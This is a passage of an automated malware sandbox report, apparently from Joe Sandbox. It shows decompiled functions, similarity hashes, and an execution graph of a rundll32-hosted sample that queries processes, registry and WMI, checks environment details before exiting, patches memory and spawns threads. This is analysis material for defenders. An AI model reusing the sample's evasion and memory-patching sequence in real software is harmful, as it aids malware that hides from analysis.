                                        0x21ef30132a6
                                        0x21ef30132ac
                                        0x21ef30132b0
                                        0x21ef30132bb
                                        0x21ef30132bf
                                        0x21ef30132cc
                                        0x21ef30132d9
                                        0x21ef30132de
                                        0x21ef30132e4
                                        0x21ef30132eb
                                        0x21ef30132f0
                                        0x21ef30132f5
                                        0x21ef30132f6
                                        0x21ef30132f7
                                        0x21ef30132f8
                                        0x21ef30132f9
                                        0x21ef30132fa
                                        0x21ef30132fb
                                        0x21ef30132fc
                                        0x21ef30132fd
                                        0x21ef30132fe
                                        0x21ef30132ff
                                        0x21ef3013300
                                        0x21ef3013309
                                        0x21ef3013316
                                        0x21ef3013318
                                        0x21ef301331c
                                        0x21ef301332a
                                        0x21ef3013330
                                        0x21ef3013336
                                        0x21ef301333b
                                        0x21ef301333d
                                        0x21ef3013346
                                        0x21ef3013348
                                        0x21ef301334c
                                        0x21ef3013350
                                        0x21ef3013354
                                        0x21ef301335d
                                        0x21ef3013364
                                        0x21ef3013369
                                        0x21ef3013375
                                        0x21ef301337a
                                        0x21ef3013389
                                        0x21ef3013396
                                        0x21ef301339b
                                        0x21ef30133b7

                                        APIs
                                        Strings
                                        • class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::co, xrefs: 0000021EF3013274
                                        • invalid iterator, xrefs: 0000021EF3013244
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionThrow__std_exception_copy
                                        • String ID: class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::co$invalid iterator
                                        • API String ID: 1552479455-1144222080
                                        • Opcode ID: ff2a5577497901d73301ed261088f2f07695bc4bb9fc64c70a55e106d006a1e8
                                        • Instruction ID: c81ef1e771c42bcc6b932a3b53119d8a3aff2929aded487c38785d58af70ced0
                                        • Opcode Fuzzy Hash: ff2a5577497901d73301ed261088f2f07695bc4bb9fc64c70a55e106d006a1e8
                                        • Instruction Fuzzy Hash: 85F0A932325F4494DB40DB14E88829E33B5B354364F925335DEBD47BA5EB79C556C340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF300F790 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        • invalid iterator, xrefs: 0000021EF300F7B4
                                        • class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::bea, xrefs: 0000021EF300F7E4
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionThrow__std_exception_copy
                                        • String ID: class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::bea$invalid iterator
                                        • API String ID: 1552479455-1958624756
                                        • Opcode ID: 2c99ee0430621d879f49c29174ada56f92ace1776ddcd71bc9e0b2087642e26f
                                        • Instruction ID: ab3629cdc0ac63e5507547706b9abe28312254633d459fc723637ee62421651a
                                        • Opcode Fuzzy Hash: 2c99ee0430621d879f49c29174ada56f92ace1776ddcd71bc9e0b2087642e26f
                                        • Instruction Fuzzy Hash: 55F0F932325F4494EB40DB14E88828E33B6B354360F524325DEBD47BA1EF79C556C340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3001E80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 60%
                                        			E0000021E21EF3001E80(long long __rax, long long __rbx, long long __rsi, long long _a8, long long _a16) {
				long long _v16;
				intOrPtr _v24;
				long long _v32;
				long long _v40;
				long _t10;
				void* _t12;
				long _t13;
				long long _t17;
				void* _t21;
				void* _t23;

				_t17 = __rax;
				_v40 = 0xfffffffe;
				_a8 = __rbx;
				_a16 = __rsi;
				_v32 = 0xf320b688;
				_t10 = TlsAlloc();
				if (_t10 != 0xffffffff) goto 0xf3001ede;
				_t13 = GetLastError();
				_t12 = E0000021E21EF310D880(_t21, _t23);
				_v24 = _t13;
				_v16 = _t17;
				if (_t13 == 0) goto 0xf3001ede;
				0xf2fee680();
				asm("int3");
				 *0xf320b688 = _t10;
				return _t12;
			}













                                        0x21ef3001e80
                                        0x21ef3001e86
                                        0x21ef3001e8f
                                        0x21ef3001e94
                                        0x21ef3001ea0
                                        0x21ef3001ea5
                                        0x21ef3001eb0
                                        0x21ef3001eb8
                                        0x21ef3001eba
                                        0x21ef3001ebf
                                        0x21ef3001ec3
                                        0x21ef3001eca
                                        0x21ef3001ed8
                                        0x21ef3001edd
                                        0x21ef3001ede
                                        0x21ef3001ef6

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocErrorExceptionInit_thread_footerLastThrow__std_exception_copy
                                        • String ID: tss
                                        • API String ID: 1176384431-1638339373
                                        • Opcode ID: c66cd73c7aa0eac1c00c9ada76600de5f76c2fd3cc8cac3decf1b725954ce2c9
                                        • Instruction ID: ea81af159c8f3d7d0d331d6c1b4dd15d7608159946dafd9c842c18d6844bd4a2
                                        • Opcode Fuzzy Hash: c66cd73c7aa0eac1c00c9ada76600de5f76c2fd3cc8cac3decf1b725954ce2c9
                                        • Instruction Fuzzy Hash: C0F0FF76614B9082EE109B65BC8818EA3B4F794BB0F560315EEA543FE9DF7CC556CB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3013910 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        • class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::bea, xrefs: 0000021EF3013964
                                        • invalid iterator, xrefs: 0000021EF3013934
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionThrow__std_exception_copy
                                        • String ID: class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::bea$invalid iterator
                                        • API String ID: 1552479455-1958624756
                                        • Opcode ID: f9cb10991de64b17ebd7da1a7a7a2e4f0b69b10be19076ba350ae9fef8477257
                                        • Instruction ID: 0bfb35e8639a49bdd82801ca1279ef80a99259c2c8cb48f7422e7732c473d590
                                        • Opcode Fuzzy Hash: f9cb10991de64b17ebd7da1a7a7a2e4f0b69b10be19076ba350ae9fef8477257
                                        • Instruction Fuzzy Hash: 9DF01932326F4594DA40DB14E89829D33A5F364360F524625DEBE47BA1EB39C556C340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FEE9E0 Relevance: 5.1, APIs: 4, Instructions: 99COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 16%
                                        			E0000021E21EF2FEE9E0(long long __rbx, long long __rcx, intOrPtr* __rdx, long long* __r8, void* __r9) {
				void* _t28;
				long long _t48;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t64;
				intOrPtr _t74;
				intOrPtr _t76;
				long long _t80;
				void* _t83;

				 *((long long*)(_t83 + 0x20)) = 0xfffffffe;
				 *((long long*)(_t83 + 0x68)) = __rbx;
				 *((long long*)(_t83 + 0x70)) = _t80;
				 *((long long*)(_t83 + 0x28)) = __rcx;
				EnterCriticalSection(??);
				 *((char*)(_t83 + 0x30)) = 1;
				_t74 =  *((intOrPtr*)(__rcx + 0x30));
				if (_t74 == 0) goto 0xf2feea6b;
				_t48 =  *((intOrPtr*)(_t74 + 0x10));
				if (_t48 == 0) goto 0xf2feea3c;
				_t58 =  *((intOrPtr*)(__rdx + 8));
				if (_t58 == 0) goto 0xf2feea3c;
				if (_t48 == _t58) goto 0xf2feeb10;
				if ( *((intOrPtr*)(_t74 + 8)) == 0) goto 0xf2feea62;
				if ( *__rdx == 0) goto 0xf2feea62;
				if (E0000021E21EF310E19C( *((intOrPtr*)(_t74 + 8)) + 8,  *__rdx + 8) == 0) goto 0xf2feeb10;
				if ( *((intOrPtr*)(_t74 + 0x20)) != 0) goto 0xf2feea21;
				LeaveCriticalSection(??);
				 *((char*)(_t83 + 0x30)) = 0;
				 *__r8();
				_t55 = _t48;
				 *((long long*)(_t83 + 0x60)) = _t48;
				asm("movups xmm0, [esi]");
				asm("movups [eax+0x8], xmm0");
				EnterCriticalSection(??);
				 *((char*)(_t83 + 0x30)) = 1;
				_t76 =  *((intOrPtr*)(__rcx + 0x30));
				if (_t76 == 0) goto 0xf2feeae7;
				_t49 =  *((intOrPtr*)(_t76 + 0x10));
				if (_t49 == 0) goto 0xf2feeabc;
				_t64 =  *((intOrPtr*)(__rdx + 8));
				if (_t64 == 0) goto 0xf2feeabc;
				if (_t49 == _t64) goto 0xf2feeafd;
				if ( *((intOrPtr*)(_t76 + 8)) == 0) goto 0xf2feeade;
				if ( *__rdx == 0) goto 0xf2feeade;
				if (E0000021E21EF310E19C( *((intOrPtr*)(_t76 + 8)) + 8,  *__rdx + 8) == 0) goto 0xf2feeafd;
				if ( *((intOrPtr*)(_t76 + 0x20)) != 0) goto 0xf2feeaa5;
				 *((long long*)(_t55 + 0x20)) =  *((intOrPtr*)(__rcx + 0x30));
				 *((long long*)(__rcx + 0x30)) = _t55;
				 *((long long*)(_t83 + 0x60)) = _t55;
				if (_t55 == 0) goto 0xf2feeb10;
				_t28 =  *((intOrPtr*)( *_t55))();
				LeaveCriticalSection(??);
				return _t28;
			}













                                        0x21ef2fee9e9
                                        0x21ef2fee9f2
                                        0x21ef2fee9f7
                                        0x21ef2feea08
                                        0x21ef2feea0d
                                        0x21ef2feea13
                                        0x21ef2feea18
                                        0x21ef2feea1f
                                        0x21ef2feea21
                                        0x21ef2feea28
                                        0x21ef2feea2a
                                        0x21ef2feea31
                                        0x21ef2feea36
                                        0x21ef2feea43
                                        0x21ef2feea4b
                                        0x21ef2feea5c
                                        0x21ef2feea69
                                        0x21ef2feea6e
                                        0x21ef2feea74
                                        0x21ef2feea7c
                                        0x21ef2feea7f
                                        0x21ef2feea82
                                        0x21ef2feea87
                                        0x21ef2feea8a
                                        0x21ef2feea91
                                        0x21ef2feea97
                                        0x21ef2feea9c
                                        0x21ef2feeaa3
                                        0x21ef2feeaa5
                                        0x21ef2feeaac
                                        0x21ef2feeaae
                                        0x21ef2feeab5
                                        0x21ef2feeaba
                                        0x21ef2feeac3
                                        0x21ef2feeacb
                                        0x21ef2feeadc
                                        0x21ef2feeae5
                                        0x21ef2feeaeb
                                        0x21ef2feeaf2
                                        0x21ef2feeaf8
                                        0x21ef2feeb00
                                        0x21ef2feeb0d
                                        0x21ef2feeb13
                                        0x21ef2feeb2e

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalSection$EnterLeave
                                        • String ID:
                                        • API String ID: 3168844106-0
                                        • Opcode ID: 1c489b95e9b53e891c7b99cec89d2013ba3dde76873832c0f54ee565194db6cf
                                        • Instruction ID: c9048c928e62b1550607658427fc3f1a161ac02ff70cea2873a2675f2af91c70
                                        • Opcode Fuzzy Hash: 1c489b95e9b53e891c7b99cec89d2013ba3dde76873832c0f54ee565194db6cf
                                        • Instruction Fuzzy Hash: 7E418732311F4146EE568F16E94439963A1FBA5FE0F0985289E9F17F98DF78D4928340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Execution Graph

                                        Execution Coverage:1.4%
                                        Dynamic/Decrypted Code Coverage:0.2%
                                        Signature Coverage:0%
                                        Total number of Nodes:613
                                        Total number of Limit Nodes:40
                                        execution_graph 58186 1c3386e59d0 58191 1c33880ba74 58186->58191 58189 1c3386e5a0b 58190 1c3386e59f7 WSAStartup 58190->58189 58194 1c33880ba24 58191->58194 58193 1c3386e59e3 58193->58189 58193->58190 58195 1c33880ba53 58194->58195 58197 1c33880ba49 _onexit 58194->58197 58198 1c3388260a4 6 API calls _onexit 58195->58198 58197->58193 58198->58197 58199 1c33882b524 58204 1c33882b547 _Init_thread_footer fflush 58199->58204 58200 1c33882b593 58204->58200 58205 1c33882b27c 58204->58205 58213 1c338822114 58205->58213 58207 1c33882b2ef 58218 1c338824ee0 58207->58218 58209 1c33882b29c 58209->58207 58217 1c33882722c FreeLibrary __crtLCMapStringW std::_Init_locks::_Init_locks 58209->58217 58210 1c33882b2f9 58210->58200 58212 1c33882b41c EnterCriticalSection 58210->58212 58214 1c338822125 __crtLCMapStringA new 58213->58214 58216 1c338822174 58214->58216 58222 1c338818984 5 API calls _invalid_parameter_noinfo 58214->58222 58216->58209 58217->58209 58219 1c338824ee5 __free_lconv_num 58218->58219 58221 1c338824f05 _com_util::ConvertStringToBSTR __free_lconv_num 58218->58221 58219->58221 58223 1c338818984 5 API calls _invalid_parameter_noinfo 58219->58223 58221->58210 58222->58216 58223->58221 58224 1c3387201d8 RegOpenKeyExW 58225 1c338720234 58224->58225 58226 1c33872020c RegCloseKey 58224->58226 58228 1c33880c290 _handle_error 4 API calls 58225->58228 58231 1c33880c290 58226->58231 58230 1c338720246 58228->58230 58229 1c33872022c 58232 1c33880c29a 58231->58232 58233 1c33880c2a6 58232->58233 58234 1c33880c2e8 IsProcessorFeaturePresent 58232->58234 58233->58229 58235 1c33880c2ff 58234->58235 58238 1c33880c4dc RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 58235->58238 58237 1c33880c312 58237->58229 58238->58237 58239 1c33871dda1 58240 1c33871dda8 58239->58240 58249 1c33871e8f0 58240->58249 58242 1c33871ddb2 58258 1c33871e990 58242->58258 58246 1c33871ddd3 58277 1c33871ec20 58246->58277 58248 1c33871dde1 58299 1c33880e410 58249->58299 58252 1c33871e93c StrCmpIW 58254 1c33880c290 _handle_error 4 API calls 58252->58254 58253 1c33871e96f 58255 1c33880c290 _handle_error 4 API calls 58253->58255 58256 1c33871e967 58254->58256 58257 1c33871e981 58255->58257 58256->58242 58257->58242 58259 1c33871e9d0 fread_s 58258->58259 58261 1c33871ea15 58259->58261 58301 1c3387210e0 CreateToolhelp32Snapshot 58259->58301 58262 1c33880c290 _handle_error 4 API calls 58261->58262 58263 1c33871ddc5 58262->58263 58264 1c33871ea40 58263->58264 58313 1c3387211c0 CoInitializeEx 58264->58313 58266 1c33871ec15 58266->58246 58267 1c33871eb0a 58269 1c33871eb14 SysFreeString 58267->58269 58275 1c33871eb1d wcsstr 58267->58275 58268 1c33871eb01 SysFreeString 58268->58267 58269->58275 58270 1c33871ec05 58270->58246 58271 1c33871ebdf CoUninitialize 58271->58270 58272 1c33871ea6b _com_util::ConvertStringToBSTR 58272->58266 58272->58267 58272->58268 58273 1c33871eafb CoUninitialize 58272->58273 58273->58268 58275->58270 58275->58271 58276 1c33871ebba VariantClear 58275->58276 58276->58275 58278 1c3387211c0 8 API calls 58277->58278 58286 1c33871ec80 _com_util::ConvertStringToBSTR 58278->58286 58279 1c33871eef7 58280 1c33880c290 _handle_error 4 API calls 58279->58280 58281 1c33871ef1e 58280->58281 58281->58248 58282 1c33871ed20 58283 1c33871ed25 SysFreeString 58282->58283 58289 1c33871ed2e 58282->58289 58283->58289 58284 1c33871ed17 SysFreeString 58284->58282 58285 1c33871eec9 CoUninitialize 58285->58279 58286->58279 58286->58282 58286->58284 58287 1c33871ed11 CoUninitialize 58286->58287 58287->58284 58289->58279 58289->58285 58290 1c33871eea8 VariantClear 58289->58290 58291 1c33871edc0 StrCmpIW 58289->58291 58290->58289 58291->58290 58292 1c33871edd9 VariantClear 58291->58292 58293 1c33871ee05 SafeArrayAccessData 58292->58293 58293->58290 58294 1c33871ee1e SafeArrayGetLBound SafeArrayGetUBound 58293->58294 58295 1c33871ee9f SafeArrayUnaccessData 58294->58295 58296 1c33871ee50 SafeArrayGetElement 58294->58296 58295->58290 58298 1c33871ee70 58296->58298 58298->58295 58298->58296 58325 1c338820790 18 API calls 3 library calls 58298->58325 58300 1c33871e91b WNetGetProviderNameW 58299->58300 58300->58252 58300->58253 58302 1c338721124 Process32FirstW 58301->58302 58303 1c33872119d 58301->58303 58304 1c338721194 CloseHandle 58302->58304 58305 1c33872113e StrCmpIW 58302->58305 58306 1c33880c290 _handle_error 4 API calls 58303->58306 58304->58303 58307 1c338721153 CloseHandle 58305->58307 58308 1c33872115f Process32NextW 58305->58308 58309 1c3387211af 58306->58309 58307->58303 58308->58304 58310 1c33872116e 58308->58310 58309->58259 58311 1c338721170 StrCmpIW 58310->58311 58311->58307 58312 1c338721185 Process32NextW 58311->58312 58312->58304 58312->58311 58314 1c3387211de 58313->58314 58315 1c3387211eb CoInitializeSecurity 58313->58315 58314->58272 58316 1c338721244 CoUninitialize 58315->58316 58317 1c338721221 CoCreateInstance 58315->58317 58316->58272 58317->58316 58318 1c33872125c _com_util::ConvertStringToBSTR 58317->58318 58319 1c3387212ba CoSetProxyBlanket 58318->58319 58322 1c3387212b4 SysFreeString 58318->58322 58323 1c3387212ac SysFreeString 58318->58323 58320 1c338721306 58319->58320 58321 1c3387212ea CoUninitialize 58319->58321 58320->58272 58321->58320 58322->58319 58323->58321 58325->58298 58326 1c33871dce2 58327 1c33871dcfe 58326->58327 58329 1c33871dde1 58327->58329 58349 1c33871e190 58327->58349 58336 1c33871dd47 58336->58329 58392 1c338720fd0 GetProcessHeap 58336->58392 58338 1c33871dd63 58404 1c33871e7d0 58338->58404 58341 1c33871dda8 58342 1c33871e8f0 6 API calls 58341->58342 58343 1c33871ddb2 58342->58343 58344 1c33871e990 12 API calls 58343->58344 58345 1c33871ddc5 58344->58345 58346 1c33871ea40 13 API calls 58345->58346 58347 1c33871ddd3 58346->58347 58348 1c33871ec20 38 API calls 58347->58348 58348->58329 58350 1c33871e250 fread_s 58349->58350 58352 1c33871e2aa 58350->58352 58411 1c338720ee0 58350->58411 58353 1c33880c290 _handle_error 4 API calls 58352->58353 58354 1c33871dd1d 58353->58354 58355 1c33871e2e0 58354->58355 58356 1c33871e380 fread_s 58355->58356 58357 1c33871e3b6 RegOpenKeyExW 58356->58357 58359 1c33871e3eb 58356->58359 58357->58356 58358 1c33871e3ef RegCloseKey 58357->58358 58358->58359 58360 1c33880c290 _handle_error 4 API calls 58359->58360 58361 1c33871dd2b 58360->58361 58362 1c33871e430 58361->58362 58363 1c33871e539 fread_s 58362->58363 58364 1c33871e54a GetWindowsDirectoryW 58363->58364 58421 1c338720e50 58364->58421 58366 1c33871e568 58367 1c33871e56c Wow64DisableWow64FsRedirection 58366->58367 58369 1c33871e577 fread_s 58366->58369 58367->58369 58368 1c33871e580 PathCombineW 58368->58369 58369->58368 58370 1c33871e5c6 GetFileAttributesW 58369->58370 58372 1c33871e5e2 58369->58372 58370->58369 58371 1c33871e610 58373 1c33880c290 _handle_error 4 API calls 58371->58373 58372->58371 58375 1c33871e64f GetCurrentProcess 58372->58375 58374 1c33871dd39 58373->58374 58378 1c33871e6a0 58374->58378 58376 1c33871e65f 58375->58376 58376->58371 58377 1c33871e666 Wow64RevertWow64FsRedirection 58376->58377 58377->58371 58379 1c33871e6ce fread_s 58378->58379 58380 1c338720e50 GetCurrentProcess 58379->58380 58381 1c33871e72b 58380->58381 58382 1c33871e737 ExpandEnvironmentStringsW 58381->58382 58383 1c33871e74c SHGetSpecialFolderPathW 58381->58383 58384 1c33871e75b PathCombineW GetFileAttributesW 58382->58384 58383->58384 58385 1c33871e789 58384->58385 58386 1c33871e7aa 58384->58386 58385->58386 58388 1c33871e78d 58385->58388 58387 1c33880c290 _handle_error 4 API calls 58386->58387 58389 1c33871e7bc 58387->58389 58390 1c33880c290 _handle_error 4 API calls 58388->58390 58389->58336 58391 1c33871e7a2 58390->58391 58391->58336 58393 1c338721003 __crtLCMapStringA 58392->58393 58394 1c33872101d GetAdaptersInfo 58393->58394 58395 1c33872100b 58393->58395 58396 1c338721030 GetProcessHeap 58394->58396 58398 1c338721072 GetProcessHeap 58394->58398 58395->58338 58426 1c338844240 58396->58426 58400 1c3387210ce __free_lconv_num 58398->58400 58400->58338 58405 1c33871e840 CreateFileW 58404->58405 58406 1c33871e884 fread_s 58405->58406 58406->58405 58407 1c33871e8b0 CloseHandle 58406->58407 58408 1c33871e8ac 58406->58408 58407->58408 58409 1c33880c290 _handle_error 4 API calls 58408->58409 58410 1c33871dd72 FindWindowW FindWindowW 58409->58410 58410->58341 58412 1c33880e410 fread_s 58411->58412 58413 1c338720f21 RegOpenKeyExW 58412->58413 58414 1c338720f50 RegQueryValueExW 58413->58414 58417 1c338720fac 58413->58417 58415 1c338720f7c StrStrIW 58414->58415 58416 1c338720fa1 RegCloseKey 58414->58416 58415->58416 58418 1c338720f8f RegCloseKey 58415->58418 58416->58417 58419 1c33880c290 _handle_error 4 API calls 58417->58419 58418->58417 58420 1c338720fbe 58419->58420 58420->58350 58423 1c338720e68 58421->58423 58422 1c338720e78 58422->58366 58423->58422 58424 1c338720ebe GetCurrentProcess 58423->58424 58425 1c338720ece 58424->58425 58425->58366 58440 1c33871f120 58441 1c3387211c0 8 API calls 58440->58441 58448 1c33871f14b _com_util::ConvertStringToBSTR 58441->58448 58442 1c33871f2ec 58443 1c33871f1ea 58445 1c33871f1f4 SysFreeString 58443->58445 58452 1c33871f1fd wcsstr 58443->58452 58444 1c33871f1e1 SysFreeString 58444->58443 58445->58452 58446 1c33871f2dc 58447 1c33871f2b8 CoUninitialize 58447->58446 58448->58442 58448->58443 58448->58444 58449 1c33871f1db CoUninitialize 58448->58449 58449->58444 58451 1c33871f293 VariantClear 58451->58452 58452->58446 58452->58447 58452->58451 58453 1c3386eae60 58454 1c3386eae75 58453->58454 58460 1c3386eaefe 58453->58460 58454->58454 58455 1c3386eae9a 58454->58455 58456 1c3386eaea4 VirtualAlloc 58454->58456 58461 1c33871b69c GetModuleHandleA 58455->58461 58456->58455 58462 1c3386eaed9 58461->58462 58463 1c33871b6c9 58461->58463 58467 1c338811df0 58462->58467 58485 1c33871c2b0 58463->58485 58468 1c338811e09 58467->58468 58469 1c338811e20 58467->58469 58523 1c338818984 5 API calls _invalid_parameter_noinfo 58468->58523 58516 1c338811d90 58469->58516 58473 1c338811e0e 58524 1c338811bc8 5 API calls _invalid_parameter_noinfo 58473->58524 58474 1c338811e33 CreateThread 58476 1c338811e63 _com_util::ConvertStringToBSTR 58474->58476 58477 1c338811e70 58474->58477 58525 1c338818914 5 API calls 2 library calls 58476->58525 58478 1c338811e19 58477->58478 58479 1c338811e86 58477->58479 58480 1c338811e80 CloseHandle 58477->58480 58478->58460 58482 1c338811e95 58479->58482 58483 1c338811e8f FreeLibrary 58479->58483 58480->58479 58484 1c338824ee0 __free_lconv_num 5 API calls 58482->58484 58483->58482 58484->58478 58486 1c33871b6df 58485->58486 58487 1c33871c2ef 58485->58487 58486->58462 58493 1c33871b4bc 58486->58493 58487->58486 58488 1c33871c424 58487->58488 58489 1c33871c3de lstrcmpA 58487->58489 58488->58486 58490 1c33871c440 58488->58490 58489->58487 58489->58488 58503 1c33871c1ec 9 API calls 2 library calls 58490->58503 58492 1c33871c44b 58492->58486 58495 1c33871b4e8 58493->58495 58496 1c33871b54e 58495->58496 58504 1c33871b7d8 58495->58504 58497 1c33871b573 58496->58497 58512 1c33871c02c 58496->58512 58497->58462 58499 1c33871b5da VirtualProtectEx 58499->58497 58501 1c33871b63c VirtualProtectEx 58499->58501 58501->58497 58503->58492 58505 1c33871b806 58504->58505 58506 1c33871b825 VirtualQuery 58505->58506 58507 1c33871b848 VirtualAlloc 58505->58507 58510 1c33871b882 58505->58510 58506->58505 58507->58505 58509 1c33871b8fe 58507->58509 58508 1c33871b8a8 VirtualQuery 58508->58510 58509->58496 58510->58508 58510->58509 58511 1c33871b8cb VirtualAlloc 58510->58511 58511->58509 58511->58510 58515 1c33871c05e 58512->58515 58513 1c33880c290 _handle_error 4 API calls 58514 1c33871b5a4 58513->58514 58514->58497 58514->58499 58515->58513 58517 1c338822114 _Getctype 5 API calls 58516->58517 58518 1c338811db2 58517->58518 58519 1c338824ee0 __free_lconv_num 5 API calls 58518->58519 58520 1c338811dbc 58519->58520 58521 1c338811dc3 GetModuleHandleExW 58520->58521 58522 1c338811ddd 58520->58522 58521->58522 58522->58474 58522->58477 58523->58473 58524->58478 58525->58477 58526 1c3386e9060 58531 1c33871df60 58526->58531 58530 1c3386e912d 58532 1c33871e0e0 58531->58532 58533 1c3387210e0 12 API calls 58532->58533 58534 1c33871e0f7 58532->58534 58533->58532 58535 1c33880c290 _handle_error 4 API calls 58534->58535 58536 1c3386e9069 ExitProcess 58535->58536 58536->58530 58537 1c3386e915a ExitProcess 58538 1c3386e9163 58537->58538 58684 1c338811f70 58538->58684 58543 1c338811df0 9 API calls 58544 1c3386e9196 58543->58544 58690 1c3386e6400 58544->58690 58546 1c3386e91ec 58547 1c3386e6400 6 API calls 58546->58547 58548 1c3386e9233 CoInitializeEx CoInitializeSecurity 58547->58548 58715 1c33871b3f0 GetModuleHandleW 58548->58715 58550 1c3386e929a CreateEventW 58551 1c3386e92c4 _com_util::ConvertStringToBSTR 58550->58551 58717 1c33871cad0 6 API calls 58551->58717 58553 1c3386e930b 58718 1c3386e8b00 6 API calls 58553->58718 58556 1c3386e9322 58719 1c3386e1610 21 API calls ctype 58556->58719 58557 1c3386e940c 58720 1c3386e3600 21 API calls fread_s 58557->58720 58559 1c3386e9418 58721 1c3386e1440 24 API calls fread_s 58559->58721 58561 1c3386e942b 58722 1c3386eb0a0 6 API calls 58561->58722 58563 1c3386e944c 58723 1c3386eb0a0 6 API calls 58563->58723 58565 1c3386e946e 58724 1c33871cf50 6 API calls 58565->58724 58567 1c3386e947b 58568 1c3386e94cf 58567->58568 58725 1c3386e8170 6 API calls ctype 58567->58725 58728 1c33871cc50 6 API calls 58568->58728 58571 1c3386e94a1 58726 1c3386e8950 6 API calls 58571->58726 58572 1c3386e94e5 58574 1c3386e9534 58572->58574 58729 1c3386e8170 6 API calls ctype 58572->58729 58732 1c3386e6530 58574->58732 58575 1c3386e94b8 58727 1c3386e82c0 6 API calls ctype 58575->58727 58579 1c3386e9506 58730 1c3386e8950 6 API calls 58579->58730 58581 1c3386e951d 58731 1c3386e82c0 6 API calls ctype 58581->58731 58583 1c3386e957f 58584 1c3386e6400 6 API calls 58583->58584 58585 1c3386e9603 58584->58585 58586 1c3386e6400 6 API calls 58585->58586 58587 1c3386e9654 58586->58587 58748 1c3386e6a70 24 API calls 58587->58748 58590 1c3386ea821 Sleep 58600 1c3386e966a 58590->58600 58597 1c3386e9a15 Sleep 58605 1c3386e97a3 58597->58605 58599 1c3386ea710 Sleep 58599->58605 58600->58605 58606 1c3386ea279 58600->58606 58620 1c3386e6400 6 API calls 58600->58620 58638 1c3386eb0f0 6 API calls 58600->58638 58642 1c3386ebcf0 6 API calls 58600->58642 58749 1c3386f5850 94 API calls _CxxThrowException 58600->58749 58750 1c338714e20 6 API calls new 58600->58750 58751 1c3386f5cd0 94 API calls _CxxThrowException 58600->58751 58752 1c33880b674 RaiseException Concurrency::cancel_current_task new 58600->58752 58753 1c3386ebb60 RaiseException 58600->58753 58603 1c3386ea16d Sleep 58603->58605 58604 1c3386ea6c7 58769 1c3386eaf10 6 API calls 58604->58769 58605->58600 58605->58604 58607 1c3386ead95 58605->58607 58754 1c338811c60 16 API calls _Toupper 58605->58754 58755 1c338811c60 16 API calls _Toupper 58605->58755 58767 1c338811c60 16 API calls _Toupper 58605->58767 58768 1c338811c60 16 API calls _Toupper 58605->58768 58609 1c3386ea2d2 fread_s 58606->58609 58613 1c3386ea4a3 SHGetSpecialFolderPathA lstrcatA 58606->58613 58626 1c3386ea68e 58606->58626 58639 1c3386eaa9d 58606->58639 58756 1c3386e5d10 20 API calls 58606->58756 58607->58607 58609->58604 58609->58606 58757 1c338811c60 16 API calls _Toupper 58609->58757 58759 1c3386e7390 10 